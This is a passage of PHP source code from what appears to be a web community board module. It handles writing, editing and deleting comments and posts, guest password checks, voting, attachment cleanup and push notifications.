$values->idx)); } if ($values->post->midx != 0 && $values->post->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($values->post->midx, 'board', 'ment', $values->post->idx, array('idx' => $values->idx, 'from' => $values->name)); } if ($source != 0 && $sourceData->midx != 0 && $sourceData->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($sourceData->midx, 'board', 'replyment', $values->post->idx, array('idx' => $values->idx, 'from' => $values->name)); } } else { $ment = $this->getMent($values->idx); if ($this->checkPermission('ment_modify') == false && ($ment->midx != 0 && $ment->midx != $this->IM->getModule('member')->getLogged())) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($ment->midx == 0) { if ($mHash->password_validate($values->password, $ment->password) == false) { $results->success = false; $results->errors = array('password' => $this->getLanguage('error/incorrectPassword')); $results->message = $this->getLanguage('error/incorrectPassword'); } } if ($results->success == true) { if ($this->IM->getModule('member')->isLogged() == false) { $insert['name'] = $values->name; $insert['password'] = $values->password ? $mHash->password_hash($values->password) : ''; $insert['email'] = $values->email; $insert['ip'] = $_SERVER['REMOTE_ADDR']; } $insert['modify_date'] = time(); $this->db()->update($this->table->ment, $insert)->where('idx', $ment->idx)->execute(); if ($ment->midx != 0 && $ment->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($ment->midx, 'board', 'ment_modify', $values->idx, array('from' => $values->name)); } if ($this->IM->getModule('member')->isLogged() == true) { $this->IM->getModule('member')->addActivity(null, 0, 'board', 'ment_modify', array('idx' => $values->idx)); } } } if ($results->success == true) { for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'bid' => $values->post->bid, 'type' => 'MENT', 'parent' => $values->idx))->execute(); } $this->IM->getModule('attachment')->filePublish($values->attachments[$i]); } $lastMent = $this->db()->select($this->table->ment)->where('parent', $values->parent)->where('is_delete', 'FALSE')->orderBy('reg_date', 'desc')->get(); $mentnum = count($lastMent); $lastMentTime = $mentnum > 0 ? $lastMent[0]->reg_date : $values->post->reg_date; $this->db()->update($this->table->post, array('ment' => $mentnum, 'last_ment' => $lastMentTime))->where('idx', $values->parent)->execute(); if ($values->post->is_secret != 'TRUE') { $this->IM->setArticle('board', $values->post->bid, 'ment', $values->idx, time()); $this->IM->setArticle('board', $values->post->bid, 'post', $values->post->idx, time()); } $results->message = $this->getLanguage('mentWrite/success'); $results->idx = $values->idx; $results->parent = $values->parent; $results->page = $this->getMentPosition($values->idx); } } elseif (count($values->errors) > 0) { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'mentDelete') { $values->idx = Request('idx'); $ment = $this->getMent($values->idx); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_delete') == true || $ment->midx == 0 || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getDelete('ment', $values->idx); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'vote') { $values->type = in_array(Request('type'), array('post', 'ment')) == true ? Request('type') : 'post'; $values->idx = Request('idx'); $values->vote = in_array(Request('vote'), array('good', 'bad')) == true ? Request('vote') : 'good'; $values->article = $this->getArticle($values->type, $values->idx); $values->board = $this->getBoard($values->article->bid); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { $article = $this->db()->select($this->table->{$values->type})->where('idx', $values->idx)->getOne(); if ($article == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($article->midx == $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('vote/mypost'); } else { $check = $this->db()->select($this->table->history)->where('type', $values->type)->where('parent', $values->idx)->where('action', 'VOTE')->where('midx', $this->IM->getModule('member')->getLogged())->getOne(); if ($check == null) { $this->db()->update($this->table->{$values->type}, array($values->vote => $this->db()->inc()))->where('idx', $values->idx)->execute(); $this->db()->insert($this->table->history, array('type' => strtoupper($values->type), 'parent' => $values->idx, 'action' => 'VOTE', 'midx' => $this->IM->getModule('member')->getLogged(), 'result' => strtoupper($values->vote), 'reg_date' => time()))->execute(); $results->success = true; $results->message = $this->getLanguage('vote/' . $values->vote); $results->liveUpdate = 'liveUpdateBoard' . ucfirst($values->type) . ucfirst($values->vote) . $values->idx; $results->liveValue = number_format($values->vote + 1); if ($this->IM->getModule('member')->isLogged() == true) { $this->IM->getModule('member')->sendPoint(null, $values->board->vote_point, 'board', $values->type . '_' . $values->vote, array('idx' => $values->idx)); $this->IM->getModule('member')->addActivity(null, $values->board->vote_exp, 'board', $values->type . '_' . $values->vote, array('idx' => $values->idx)); } if ($article->midx != 0) { $this->IM->getModule('push')->sendPush($article->midx, 'board', $values->type . '_' . $values->vote, $article->idx, array('from' => $this->IM->getModule('member')->getLogged())); } } else { $results->success = false; $results->message = $this->getLanguage('vote/duplicated'); $results->result = $check->result; } } } } if ($action == 'delete') { $values->idx = Request('idx'); $values->type = Request('type'); if ($values->type == 'post') { $post = $this->getPost($values->idx); $values->board = $this->getBoard($post->bid); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_delete') == true || $post->midx != 0 && $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } elseif ($post->midx == 0) { $values->password = Request('password'); $mHash = new Hash(); if ($mHash->password_validate($values->password, $post->password) == true) { $results->success = true; } else { $results->success = false; $results->errors = array('password' => $this->getLanguage('error/incorrectPassword')); } } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->delete($this->table->post)->where('idx', $post->idx)->execute(); $attachments = $this->db()->select($this->table->attachment)->where('parent', $post->idx)->where('type', 'POST')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); $ments = $this->db()->select($this->table->ment)->where('parent', $post->idx)->get(); for ($i = 0, $loop = count($ments); $i < $loop; $i++) { $this->db()->delete($this->table->ment)->where('idx', $ments[$i]->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $ments[$i]->idx)->execute(); $attachments = $this->db()->select($this->table->attachment)->where('parent', $ments[$i]->idx)->where('type', 'MENT')->get(); for ($j = 0, $loopj = count($attachments); $j < $loopj; $j++) { $attachments[$j] = $attachments[$j]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); } if ($post->category != 0) { $lastPost = $this->db()->select($this->table->post)->where('category', $post->category)->orderBy('reg_date', 'desc')->get(); $postnum = count($lastPost); $lastPostTime = $postnum > 0 ? $lastPost[0]->reg_date : 0; $this->db()->update($this->table->category, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $post->category)->execute(); } if ($post->midx != 0) { $this->IM->getModule('member')->sendPoint($post->midx, $values->board->post_point * -1, 'board', 'post_delete', array('title' => $post->title), true); if ($post->midx == $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('member')->addActivity($post->midx, 0, 'board', 'post_delete', array('title' => $post->title)); } else { $this->IM->getModule('push')->sendPush($post->midx, 'board', 'post_delete', $values->idx, array('title' => $post->title)); } } $this->IM->deleteArticle('board', 'post', $values->idx); } } elseif ($values->type == 'ment') { $ment = $this->getMent($values->idx); $post = $this->getPost($ment->parent); $values->board = $this->getBoard($post->bid); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_delete') == true || $ment->midx != 0 && $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } elseif ($ment->midx == 0) { $values->password = Request('password'); $mHash = new Hash(); if ($mHash->password_validate($values->password, $ment->password) == true) { $results->success = true; } else { $results->success = false; $results->errors = array('password' => $this->getLanguage('error/incorrectPassword')); } } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { if ($this->checkMentTree($values->idx) == false) { $this->db()->delete($this->table->ment)->where('idx', $values->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $values->idx)->execute(); if ($ment->source != 0) { $source = $this->getMent($ment->source); while ($source->is_delete == 'TRUE') { if ($this->checkMentTree($source->idx) == false) { $this->db()->delete($this->table->ment)->where('idx', $source->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $source->idx)->execute(); if ($source->source != 0) { $source = $this->getMent($source->source); } else { break; } } else { break; } } } $results->position = null; } else { $results->position = $values->idx; $this->db()->update($this->table->ment, array('is_delete' => 'TRUE', 'modify_date' => time(), 'content' => '', 'search' => ''))->where('idx', $ment->idx)->execute(); } $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); $lastMent = $this->db()->select($this->table->ment)->where('parent', $ment->parent)->where('is_delete', 'FALSE')->orderBy('reg_date', 'desc')->get(); if (count($lastMent) == 0) { $this->db()->update($this->table->post, array('ment' => 0, 'last_ment' => $post->reg_date))->where('idx', $ment->parent)->execute(); $results->parent = $ment->parent; } else { if ($results->position == null) { $position = $this->db()->select($this->table->ment_depth)->where('parent', $ment->parent)->where('head', $ment->head, '<=')->where('arrange', $ment->arrange, '<')->orderBy('head', 'asc')->orderBy('arrange', 'asc')->get(); $lastPosition = array_pop($position); $results->position = $lastPosition->idx; } $this->db()->update($this->table->post, array('ment' => count($lastMent), 'last_ment' => $lastMent[0]->reg_date))->where('idx', $ment->parent)->execute(); } if ($ment->midx != 0) { $this->IM->getModule('member')->sendPoint($ment->midx, $values->board->ment_point * -1, 'board', 'ment_delete', array('title' => $post->title), true); if ($ment->midx == $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('member')->addActivity($ment->midx, 0, 'board', 'ment_delete', array('title' => $post->title)); } else { $this->IM->getModule('push')->sendPush($ment->midx, 'board', 'ment_delete', $values->idx, array('title' => $post->title)); } } $this->IM->deleteArticle('board', 'ment', $values->idx); $results->message = $this->getLanguage('mentDelete/success'); } } $results->type = $values->type; } $this->IM->fireEvent('afterDoProcess', 'board', $action, $values, $results); return $results; }